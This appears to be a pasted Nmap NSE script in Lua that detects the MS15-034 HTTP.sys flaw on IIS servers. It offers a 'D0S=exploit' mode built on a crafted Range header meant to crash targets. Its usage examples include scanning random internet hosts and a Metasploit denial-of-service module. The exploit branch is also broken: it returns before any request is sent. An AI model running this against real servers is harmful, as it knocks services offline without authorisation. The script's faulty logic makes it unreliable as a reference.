ms15-034.nse (http.sys vulnerability check/exploit)

  1. -- Original nse module written by: DigitalStroopwafel
-- Copy this nse script to: /usr/share/nmap/scripts
  3. -- Update database: sudo nmap --script-updatedb
  4. -- Usage: sudo nmap --script-help ms15-034.nse
  5. -- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  6. -- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  7.  
  8.  
  9. -- Dependencies (Lua libs)
  10. -- all dependencies are satisfied (nmap default installation)..
  11. local http = require('http')
  12. local string = require('string')
  13. local shortport = require('shortport')
  14. local stdnse = require ('stdnse')
  15. local vulns = require ('vulns')
  16.  
  17.  
-- NSE 'description' field: the free-form help text printed by
-- `nmap --script-help ms15-034.nse`. The usage examples are repeated in the
-- NSEDoc @usage block further down; keep the two in sync when editing.
description = [[

author: DigitalStroopwafel, r00t-3xp10it
Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit
it using script args (--script-args D0S=exploit) or we can scan further using another
argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8,
8.1, Windows Server 2008 R2, 2012 and 2012R2.

Some syntax examples:
nmap -sV -Pn -p 80 --script vuln <target>
nmap -sV -Pn -p 80 --script ms15-034.nse <target>
nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri <target>
nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log
]]
  34.  
  35. ---
  36. -- @usage
  37. -- nmap --script-help ms15-034.nse
  38. -- nmap -sV -Pn -p 80 --script vuln <target>
  39. -- nmap -sS -Pn -p 80 --script ms15-034.nse <target>
  40. -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ <target>
  41. -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  42. -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  43. -- @output
  44. -- PORT   STATE SERVICE
  45. -- 80/tcp open  http
  46. -- |_ms15-034: http.sys its Vulnerable
  47. -- |   State: VULNERABLE
  48. -- |     IDs: CVE-2015-1635
  49. -- |     Response: 416 (exploitable)
  50. -- |     Disclosure date: 2015-06-17
  51. -- |     Author: DigitalStroopwafel(module)
  52. -- |             r00t-3xp10it(review)
  53. -- |
  54. -- |     Description:
  55. -- |     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on
  56. -- |     HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,
  57. -- |     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.
  58. -- |     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>
  59. -- |     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd
  60. -- |
  61. -- |     References:
  62. -- |     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
  63. -- |     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
  64. -- |     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
  65. -- |_
  66. -- @args ms15-034.uri URI to use in request. Default: /
  67. -- @args ms15-034.D0S exploit the Denial-Of-Service condition
  68. ---
  69.  
  70.  
  71. author = "DigitalStroopwafel, r00t-3xp10it"
  72. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  73. categories = {"vuln", "dos"}
  74.  
  75.  
  76.  
  77. -- THE RULES SECTION --
  78. -- portrule = shortport.http [added port number and service to portrule]
  79. portrule = shortport.port_or_service({80, 443, 631, 5800}, "http, https, ipp, vnc", "tcp", "open")
  80. -- local uri = "/" [updated to use script arguments (anotheruri)]
  81. local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
  82.  
  83.  
  84. -- THE ACTION SECTION --
  85. action = function(host, port)
  86. local options = {header={}}
  87. options['header']['User-Agent'] = "Mozilla/5.0 (compatible; EvilMonkey)"
  88. options['header']['Host'] = stdnse.generate_random_string(8)
  89.  
  90.  
  91. -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3'
  92. -- change this script range byte from "0-" to "18-" to exploit D0S
  93. -- using script args to run denial-of-service or scanning for vulnerability
  94. local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S")
  95.   if (D0S == "exploit") then
  96.     options['header']['Range'] = "bytes=18-18446744073709551615"
  97.     return "Executing Denial-Of-Service Condition...\nstatus  : please ping target to comfirm tango down..."
  98.   else
  99.     options['header']['Range'] = "bytes=0-18446744073709551615"
  100. end
  101.  
  102.  
  103. -- get response from target website
  104. local response = http.get(host, port, uri, options)
  105. local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
  106.  
  107. -- display target response (script output)
  108. if ( title == "Requested Range Not Satisfiable" ) then
  109.   return "http.sys its Vulnerable\n   State: VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (exploitable)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n     Description:\n     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n     on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>\n     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n     References:\n     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n"
  110.  
  111. else
  112.  
  113.   return "http.sys not Vulnerable\n   State: NOT VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (we need: 416)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n"
  114.  
  115.   end
  116. end